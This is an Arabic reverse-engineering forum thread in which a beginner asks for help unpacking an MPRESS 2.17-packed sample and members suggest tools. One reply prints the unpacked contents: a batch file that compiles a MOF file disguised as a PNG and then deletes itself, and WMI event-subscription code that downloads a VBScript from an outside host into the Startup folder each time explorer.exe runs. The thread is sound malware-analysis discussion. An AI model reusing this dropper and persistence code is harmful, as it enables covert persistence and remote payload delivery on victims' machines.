مساعدة حول حماية MPRESS 2.17 - نسخة قابلة للطباعة

مساعدة حول حماية MPRESS 2.17 - نسخة قابلة للطباعة

+- الفريق العربي للهندسة العكسية (https://www.at4re.net/f)
+-- قسم : منتديات الهندسة العكسية - Reverse Engineering Forums (https://www.at4re.net/f/forum-4.html)
+--- قسم : الأسئلة والإستفسارات، حلول المشاكل و تبادل الخبرات - Expert Exchange Newbie Questions Answers (https://www.at4re.net/f/forum-36.html)
+--- الموضوع : مساعدة حول حماية MPRESS 2.17 (/thread-2981.html)

مساعدة حول حماية MPRESS 2.17 - abu_youssef - 11-02-2022

السلام عليكم
جمعه طيبة على الجميع
اخواني انا مبتدئ في الهندسة العكسية فا احتاج الي خبرتكم ومساعدة حول فك ضغط MPRESS 2.17
https://imgur.com/a/DJ54yFa
استخدمت de4dot بكل اصداراته ولم استطع فك الحماية
ماهي الادوات المطلوبه لفك الحماية

RE: مساعدة حول حماية MPRESS 2.17 - H@wk0 - 11-02-2022

جرب هذه الأداة MPress Unpacker

RE: مساعدة حول حماية MPRESS 2.17 - abu_youssef - 11-02-2022

للاسف لم تنجح الطريقه ..
بحاول اني اسوي تفريغ للملف عن طريق megadumper لكن اواجه مشكله ان الملف يشتغل ثم يغلق نفسه ع طول ويوجد ملفات تنزل بعد التشغيل

RE: مساعدة حول حماية MPRESS 2.17 - TeRcO - 12-02-2022

(11-02-2022, 08:26 AM)abu_youssef كتب : احتاج الي خبرتكم ومساعدة حول فك ضغط MPRESS 2.17

ممكن رابط البرنامج للمحاولة

RE: مساعدة حول حماية MPRESS 2.17 - abu_youssef - 12-02-2022

البرنامج يوجد داخله ملف Batch و ملف JPG طبعا داخل الصورة اكواد برمجة و ملف BAT لتشغيل الاكواد من داخل الصورة
وهذا الرابط
https://www.mediafire.com/file/jp0biwfc73nufb2/cleaner.zip/file

ملاحظه اذا شغلت الملف لابد يكون عندك برنامج Autoruns
https://imgur.com/a/PbvCHV2
كما فالصوره تقوم بحذفه ويمكنك الضغط عليه مرتين لمشاهده الملف
والملف الي ينزل MSgBox بصيغه vbs
الهدف هو الكسر فقط

RE: مساعدة حول حماية MPRESS 2.17 - abu_youssef - 21-02-2022

[b]TeRcO[/b]

هل جربت فكها؟

RE: مساعدة حول حماية MPRESS 2.17 - Ajust - 07-03-2022

اعتقد هذا الاصدار لن تستطيع كسره حتي ولو ثبت ويندوز xp

RE: مساعدة حول حماية MPRESS 2.17 - TeRcO - 12-03-2022

(21-02-2022, 09:03 AM)abu_youssef كتب : هل جربت فكها؟

R.bat

set mypath=%cd%
set tcp = %tcp%
mofcomp tcp.png
del %mypath%\tcp.png
del %mypath%\R.bat
exit

TCP.png

#pragma AUTORECOVER
#pragma namespace ("\\\\.\\root\\subscription")

instance of ActiveScriptEventConsumer as $Cons
{
    Name = "Microsoft";
    ScriptingEngine = "VBScript";
ScriptText = "Function test() \n"

"dim xHttp \n"
" Set xHttp = createobject(\"Microsoft.XMLHTTP\") \n"
"dim bStrm\n"
 "Set bStrm = createobject(\"Adodb.Stream\") \n"
"xHttp.Open \"GET\", \"https://boostcp.000webhostapp.com/msgbox.vbs\", False \n"
"xHttp.Send \n"
"with bStrm \n"
    ".type = 1 \n"
 ".open \n"
    ".write xHttp.responseBody \n"
  ".savetofile \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updata.vbs\", 2 \n"

"end with \n"
"end function \n"
"test\n";
        
};

instance of __EventFilter as $Filt
{
    Name = "EF";
    EventNamespace = "root\\cimv2";
    QueryLanguage = "WQL";
    Query = "SELECT * FROM __InstanceCreationEvent "  
            "WITHIN 1 WHERE TargetInstance ISA 'Win32_Process' "
            "AND TargetInstance.Name = 'explorer.exe'";
};

instance of __FilterToConsumerBinding
{
    Filter = $Filt;
    Consumer = $Cons;
};

msgbox

Link:
https://boostcp.000webhostapp.com/msgbox.vbs
Message:msgbox"Risk"

(11-02-2022, 08:26 AM)abu_youssef كتب : استخدمت de4dot بكل اصداراته ولم استطع فك الحماية

لاينفع لان البرنامج ليس مبرمج ب: c# / .Net

(11-02-2022, 08:26 AM)abu_youssef كتب : ماهي الادوات المطلوبه لفك الحماية

ollydbg
لايجاد نقطة الدخول الاصلية OEP
imprec import reconstructor
dump + إصلاح جدول الدوال المستوردة IAT